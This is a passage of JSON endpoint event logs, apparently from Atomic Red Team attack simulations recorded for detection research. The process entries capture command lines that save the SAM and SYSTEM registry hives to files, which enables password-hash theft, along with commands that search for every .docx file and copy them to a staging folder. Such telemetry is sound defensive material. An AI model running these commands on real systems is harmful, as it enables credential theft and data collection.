"process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571775030000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571774950016, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "command_line": "reg save HKLM\\System system.hive", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2008, - "ppid": 3020, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571775150000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}", - "unique_ppid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571775110000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883571800270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 131883571800270000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "file", - "file_name": "REGCD01.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571806210000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "file", - "file_name": "REGCD01.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGCD01.tmp", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571806210000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "file", - "file_name": "system.hive", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\system.hive", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571807140000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807140000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807140000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "process", - "pid": 2008, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-001032005101}" - }, - { - "event_type": "process", - "pid": 3020, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB39-5C05-0000-00103EFF5001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg save HKLM\\SAM sam.hive\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3544, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571807430000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807300000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "command_line": "reg save HKLM\\SAM sam.hive", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2160, - "ppid": 3544, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571807530000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}", - "unique_ppid": "{42FC7E13-CB3C-5C05-0000-001099025101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571807460000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "file", - "file_name": "REGD250.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "file", - "file_name": "REGD250.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\REGD250.tmp", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "file", - "file_name": "sam.hive", - "file_path": "C:\\eqllib\\atomic-red-team-master\\atomics\\sam.hive", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571819800000, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "process", - "pid": 2160, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-00108E035101}" - }, - { - "event_type": "process", - "pid": 3544, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3C-5C05-0000-001099025101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1232, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571820020016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "event_type": "process", - "pid": 1232, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571819950016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00106D055101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c: /b /s .docx | findstr /e .docx\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6036, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571821140000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821050000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c: /b /s .docx \"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7980, - "ppid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571821220000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "command_line": "findstr /e .docx", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1572, - "ppid": 6036, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "create", - "timestamp": 131883571821260000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "image_load", - "image_name": "findstr.exe", - "image_path": "C:\\Windows\\System32\\findstr.exe", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821210000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571821360000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "process", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010370E5101}" - }, - { - "event_type": "process", - "pid": 1572, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "terminate", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010B90E5101}" - }, - { - "event_type": "process", - "pid": 6036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010440D5101}" - }, - { - "event_type": "file", - "file_name": "FINDSTR.EXE-4176B665.pf", - "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571821830000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /R c: %%f in (*.docx) do copy %%f c:\\temp\\\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2012, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571822010000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010A0125101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2012, - "process_name": 